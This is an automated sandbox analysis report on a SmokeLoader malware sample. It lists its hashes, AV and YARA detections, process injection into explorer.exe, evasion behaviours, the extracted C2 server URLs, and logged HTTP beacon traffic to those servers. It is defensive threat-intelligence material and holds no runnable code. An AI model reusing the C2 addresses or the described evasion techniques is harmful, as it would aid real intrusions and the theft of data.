Edit tour

Windows Analysis Report
3sfCdeA1H2.exe

Overview

General Information

Sample name:	3sfCdeA1H2.exe renamed because original name is a hash value
Original sample name:	91be25f31b7891908a50dfdc9f03f2b4.exe
Analysis ID:	1533009
MD5:	91be25f31b7891908a50dfdc9f03f2b4
SHA1:	91db4bc09a4976db1b9922e09f2330b48ae50338
SHA256:	422d2cea49b00fdc8b97b75b623006386426ec23637c53341e03d250e5ffe21b
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Query firmware table information (likely to detect VMs)

Switches to a custom stack to bypass stack traces

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to read the PEB

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

3sfCdeA1H2.exe (PID: 6248 cmdline: "C:\Users\user\Desktop\3sfCdeA1H2.exe" MD5: 91BE25F31B7891908A50DFDC9F03F2B4)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

WerFault.exe (PID: 5828 cmdline: C:\Windows\system32\WerFault.exe -u -p 2580 -s 4964 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

tttcvva (PID: 6364 cmdline: C:\Users\user\AppData\Roaming\tttcvva MD5: 91BE25F31B7891908A50DFDC9F03F2B4)

explorer.exe (PID: 6160 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3a5a:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3be2:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\tttcvva, CommandLine: C:\Users\user\AppData\Roaming\tttcvva, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\tttcvva, NewProcessName: C:\Users\user\AppData\Roaming\tttcvva, OriginalFileName: C:\Users\user\AppData\Roaming\tttcvva, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\tttcvva, ProcessId: 6364, ProcessName: tttcvva

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-14T10:02:39.243661+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49736	109.175.29.39	80	TCP
2024-10-14T10:02:40.058060+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49737	109.175.29.39	80	TCP
2024-10-14T10:02:40.996326+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49738	109.175.29.39	80	TCP
2024-10-14T10:02:41.831307+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49739	109.175.29.39	80	TCP
2024-10-14T10:02:42.639282+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49740	109.175.29.39	80	TCP
2024-10-14T10:02:43.565248+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49741	109.175.29.39	80	TCP
2024-10-14T10:02:44.373465+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49742	109.175.29.39	80	TCP
2024-10-14T10:02:45.214089+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49743	109.175.29.39	80	TCP
2024-10-14T10:02:46.041902+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49744	109.175.29.39	80	TCP
2024-10-14T10:02:47.033837+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49745	109.175.29.39	80	TCP
2024-10-14T10:02:47.853497+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49746	109.175.29.39	80	TCP
2024-10-14T10:02:48.657828+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49747	109.175.29.39	80	TCP
2024-10-14T10:02:49.462699+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49748	109.175.29.39	80	TCP
2024-10-14T10:02:50.282988+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49749	109.175.29.39	80	TCP
2024-10-14T10:02:51.090176+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49750	109.175.29.39	80	TCP
2024-10-14T10:02:51.895964+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49751	109.175.29.39	80	TCP
2024-10-14T10:02:52.778542+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49752	109.175.29.39	80	TCP
2024-10-14T10:02:53.595039+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49753	109.175.29.39	80	TCP
2024-10-14T10:02:54.432535+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49754	109.175.29.39	80	TCP
2024-10-14T10:02:55.356666+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49755	109.175.29.39	80	TCP
2024-10-14T10:02:56.161080+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49756	109.175.29.39	80	TCP
2024-10-14T10:02:56.967830+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49757	109.175.29.39	80	TCP
2024-10-14T10:02:57.802218+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49758	109.175.29.39	80	TCP
2024-10-14T10:02:58.603169+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49759	109.175.29.39	80	TCP
2024-10-14T10:02:59.501084+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49760	109.175.29.39	80	TCP
2024-10-14T10:03:00.325141+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49761	109.175.29.39	80	TCP
2024-10-14T10:03:01.241528+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49762	109.175.29.39	80	TCP
2024-10-14T10:03:02.205412+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49763	109.175.29.39	80	TCP
2024-10-14T10:03:03.013839+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49764	109.175.29.39	80	TCP
2024-10-14T10:03:03.820532+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49765	109.175.29.39	80	TCP
2024-10-14T10:03:04.823196+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49766	109.175.29.39	80	TCP
2024-10-14T10:03:05.614746+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49767	109.175.29.39	80	TCP
2024-10-14T10:03:06.417805+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49769	109.175.29.39	80	TCP
2024-10-14T10:03:07.311724+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49770	109.175.29.39	80	TCP
2024-10-14T10:03:08.128601+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49772	109.175.29.39	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for domain / URL

Source: nwgrus.ru	Virustotal: Detection: 12%			Perma Link
Source: http://nwgrus.ru/tmp/index.php	Virustotal: Detection: 16%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\tttcvva	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\tttcvva	Virustotal: Detection: 38%			Perma Link

Multi AV Scanner detection for submitted file

Source: 3sfCdeA1H2.exe	ReversingLabs: Detection: 42%
Source: 3sfCdeA1H2.exe	Virustotal: Detection: 38%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\tttcvva

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 3sfCdeA1H2.exe

Joe Sandbox ML: detected

Source: 3sfCdeA1H2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49762 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49770 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49769 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 109.175.29.39:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 109.175.29.39 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View

IP Address: 109.175.29.39 109.175.29.39

Source: Joe Sandbox View

ASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA

Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fywxucdqvauxl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dfegowhoygianb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mxjkymtnwdus.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vsicdygcbqjjlt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mrabobimhfaodhs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hgmakgqsadecxk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vyvtnoktgixr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kpctqqwaapll.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uwrjqoiyikclmp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://irqjlvxvguaa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://otrldmaxlwsqg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://axdumywgicw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://drcsfcxotsike.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ljowgttltjb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qqrvxoxcuflyv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bwkcgbjusdxgntcy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oivflmljlhkww.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ametqvtlvslgmj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iwhghyqwahgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bvmbuxbytsytdm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nnhkspmojwnsnbxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yvnodxcwkvd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dgiwvsfymyh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wrjytrffmsivlanr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://estmwlacexvuyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hvvqajwisec.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kctacxfnspruuv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ijnkeenpcqt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lnnfpwyulse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pkoncbxvmuq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ievjgxgogeu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kavychcxkrxbq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru
